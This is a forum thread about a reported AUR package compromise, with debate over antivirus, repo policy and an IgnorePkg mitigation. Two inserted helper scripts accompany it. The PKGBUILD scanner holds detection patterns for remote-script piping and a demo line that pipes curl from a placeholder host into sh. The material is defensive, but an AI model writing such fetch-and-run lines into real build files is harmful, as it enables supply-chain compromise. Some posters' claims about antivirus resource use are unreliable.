AUR Compromised - Almost 2000 packages affected - 20260611

CachyOS repos contain a lot of AUR packages; you are not safer if you install something that’s based on the AUR. I don’t think there are additional verifications before they update a package in the repo.

There should be a separate repo for AUR packages, something like cachyos-aur; the cachyos repo should be reserved for distro-maintained packages.

Cachy repo packages have been compromised before as well. They automate a lot of their builds from the AUR with their optimizations, so it can definitely happen.

This is what I was getting at with my statement. Good post :+1:

Thinking you are smarter than bad actors or AI is precisely why this type of shit keeps happening lol

FOSS is a cesspool. You need to protect yourself.

Puh! Thanks a lot for the heads up!

This is an odd hill to die on for an exploit that’s specifically catchable via normal and recommended PKGBUILD inspection processes. Users still need to be the first and most important line of defense on top of technical measures.

The world is a cesspool. And security models generally suck.

That’s such a heavy drag for a performance oriented distro. Not a terrible idea, but even better would be an option for turning it on just while building and installing AUR packages, assuming built packages in the repos are already scanned and signed… you get the benefit with almost no downside so presumably better adoption.

Fortunately, my system is clean.

There seems to be another wave of attacks, this time using bun instead of npm.

Keep watching guys.

A good measure is what Fermin Olaiz suggested in the arch-general list:

Add

IgnorePkg = yarn bun pnpm npm nodejs-nopt node-gyp

to pacman.conf. And remove those packages from your system if they are installed. This should™️ prevent those attacks - until someone finds another vector.
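As an added example (not from the thread, the arch-general post or any distro's tooling), here is a small POSIX shell script that applies the IgnorePkg line above without duplicating it and lists which of those packages are installed. It assumes the target pacman.conf has an `[options]` section, that the script is run as root when pointed at the real `/etc/pacman.conf`, and that `pacman -Qq` is available for the installed-package check; the file name `ignorepkg.sh` is just a suggestion.

```shell
#!/bin/sh
# Added example, not part of the thread: apply the IgnorePkg line
# from the post above to a pacman.conf without duplicating it, and
# report which of the ignored packages are currently installed.

IGNORE_LINE='IgnorePkg = yarn bun pnpm npm nodejs-nopt node-gyp'
IGNORE_PKGS='yarn bun pnpm npm nodejs-nopt node-gyp'

# add_ignorepkg CONF
# Insert $IGNORE_LINE right after the [options] header of CONF.
# pacman accepts several IgnorePkg lines and merges them, so an existing
# IgnorePkg line naming other packages is left untouched; only an exact
# duplicate of our line is skipped.
add_ignorepkg() {
    conf="$1"
    if grep -Fxq "$IGNORE_LINE" "$conf"; then
        return 0
    fi
    if ! grep -q '^\[options\]' "$conf"; then
        echo "add_ignorepkg: no [options] section in $conf" >&2
        return 1
    fi
    tmp="$(mktemp)"
    awk -v line="$IGNORE_LINE" '
        { print }
        /^\[options\]/ && !done { print line; done = 1 }
    ' "$conf" > "$tmp"
    cat "$tmp" > "$conf"   # overwrite in place, keeping CONF's owner and mode
    rm -f "$tmp"
}

# count_ignore_lines CONF
# Number of exact copies of $IGNORE_LINE in CONF; 1 after add_ignorepkg.
count_ignore_lines() {
    grep -Fxc "$IGNORE_LINE" "$1" || true
}

# installed_ignored
# Print the ignored packages that are installed. pacman -Qq exits
# non-zero for a package that is absent, which is silenced here.
installed_ignored() {
    command -v pacman >/dev/null 2>&1 || { echo "pacman not found" >&2; return 1; }
    for p in $IGNORE_PKGS; do
        pacman -Qq "$p" 2>/dev/null || true
    done
}

# Usage: sh ignorepkg.sh /etc/pacman.conf   (as root for the real file)
if [ "$#" -gt 0 ]; then
    add_ignorepkg "$1"
    echo "installed packages from the ignore list (remove these by hand):"
    installed_ignored || true
else
    # No argument: demonstrate on a constructed pacman.conf fragment.
    demo="$(mktemp)"
    printf '[options]\nHoldPkg = pacman glibc\n\n[core]\nInclude = /etc/pacman.d/mirrorlist\n' > "$demo"
    add_ignorepkg "$demo"
    add_ignorepkg "$demo"   # second call is a no-op
    cat "$demo"
    rm -f "$demo"
fi
```

Running it with no argument only edits a throwaway copy; the IgnorePkg line is inserted once even when the function is called twice, and the output shows where it lands relative to the rest of the `[options]` section.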

For any and all exploits. It’s the truth and people here actually think they are :joy:

Even more so in the FOSS compute world because accountability doesn’t really exist.

No, that’s not how real-time protection works, or zero days. Also not sure what AV solution you’ve used lately that’s apparently a drag on performance. Modern ones usually have executables of less than 100k and use next to no RAM.

The information and arguments here are all outdated, but I enjoy it. I make a nice life in layer 7 security and incident response dealing specifically with Linux systems only, and these arguments and attitudes are what paid for my very expensive SUV.

I just had a brilliant idea - why not just take a shortcut, contact the AUR maintainers and tell THEM to run ClamAV, then we can all sit back and relax, because it really was that simple…

Right?

No one said this, but you being this triggered because your arguments don’t have a factor in current reality is nice. I am grateful for people like you. Have a blessed day.

Oh, ok. It wasn’t you that suggested we should all be running anti-virus scanners?

My bad, apparently.

You also failed, when requested, to issue a single example of success using such methods…

Not /usr/bin/brain?

maybe they run brain.exe in proton :sweat_smile:

huh?

You literally recommended clamav in this very thread which specifically cites using 2-3+ GB RAM to load signatures into RAM. Fine enough but not by any stretch “next to no RAM” on an OS that requires only 3GB RAM.

If you’re not yet compromised, I’d say an even more prudent measure would be to discontinue updating anything until this has been fully resolved. The attacker has demonstrated changing the attack, and ignoring some packages will not prevent them from picking a new entry point in the future.

And even after this blows over, always review the PKGBUILD for sus changes.
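As an added example (not from the thread and not an AUR helper's own feature), here is a POSIX shell script that does a first pass over a PKGBUILD, or over only the lines added since the copy you last reviewed, and prints the lines a human should read before building. The pattern list is an assumption made for illustration (node package-manager calls, which are the vector discussed in this thread, remote content piped into a shell, base64 decoding and eval); it is not exhaustive, and a clean result is not proof of safety. The sample PKGBUILD in the demo is constructed and points at the reserved `example.invalid` domain; it is not a real package.

```shell
#!/bin/sh
# Added example, not part of the thread: a first-pass scan to run on a
# PKGBUILD (or on the lines added since the copy you last reviewed)
# before building it. It only flags lines a reviewer should read by hand;
# a clean result is not proof that the PKGBUILD is safe.

# Patterns worth a second look. Illustrative list, not exhaustive:
# node package-manager invocations, remote content piped straight into a
# shell, base64 decoding, and eval.
SUSPECT_RE='(^|[^A-Za-z0-9_-])(npm|bun|pnpm|yarn)[[:space:]]+(install|i|add|exec|run|x)([[:space:]]|$)|(curl|wget)[^|]*\|[[:space:]]*(ba)?sh([[:space:]]|$)|base64[[:space:]]+(-d|--decode)|(^|[[:space:]])eval[[:space:]]'

# scan_pkgbuild FILE
# Print "LINE:text" for each flagged non-comment line of FILE. Always exits 0.
scan_pkgbuild() {
    grep -nE "$SUSPECT_RE" "$1" | grep -vE '^[0-9]+:[[:space:]]*#' || true
}

# count_hits FILE
# Number of flagged lines in FILE (0 for a clean file).
count_hits() {
    scan_pkgbuild "$1" | grep -c . || true
}

# review_pkgbuild FILE
# Print the flagged lines; exit 0 when nothing was flagged, 1 otherwise,
# so it can gate a build: review_pkgbuild PKGBUILD && makepkg -si
review_pkgbuild() {
    hits=$(scan_pkgbuild "$1")
    [ -z "$hits" ] && return 0
    printf '%s\n' "$hits"
    return 1
}

# review_added_lines OLD NEW
# Same scan, restricted to the lines NEW adds relative to OLD (the copy
# you reviewed last time). Exit 0 when no added line is flagged.
review_added_lines() {
    added=$(diff "$1" "$2" | sed -n 's/^> //p')
    hits=$(printf '%s\n' "$added" | grep -E "$SUSPECT_RE" | grep -vE '^[[:space:]]*#' || true)
    [ -z "$hits" ] && return 0
    printf '%s\n' "$hits"
    return 1
}

# Usage: sh review-pkgbuild.sh PKGBUILD [PREVIOUSLY_REVIEWED_PKGBUILD]
if [ "$#" -ge 2 ]; then
    review_added_lines "$2" "$1"
elif [ "$#" -eq 1 ]; then
    review_pkgbuild "$1"
else
    # No argument: scan a constructed PKGBUILD fragment (not a real package).
    demo="$(mktemp)"
    cat > "$demo" <<'EOF'
pkgname=example-demo
prepare() {
  cd "$srcdir/$pkgname-$pkgver"
  # bun install            <- a comment, ignored by the scan
  bun install
  curl -s https://example.invalid/setup.sh | sh
}
build() { make; }
EOF
    review_pkgbuild "$demo" || echo "read the lines above before building"
    rm -f "$demo"
fi
```

With no arguments the demo flags the two live lines in `prepare()` and skips the commented one. In day-to-day use, keep the PKGBUILD you reviewed last time next to the new one and run the two-argument form, so an update only shows you what changed; patterns that do not match this list still need the manual read the post above asks for.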

ClamAV on average uses about a gig of RAM. Not much on any modern computer, especially gaming. Other solutions like CrowdStrike and SentinelOne, for example, are under 100k and can be purchased on Amazon. Not sure where I said literally every AV solution uses that little resources, but as I said, reading is hard. Have a blessed day.

Well, this is exactly what I wrote. Nevertheless, I think that proposed measure is a good second line of defense against the current attacks.

Definitely. There’s no question about it. That’s why I’ve repeatedly warned against using chaotic-aur.

Something useful: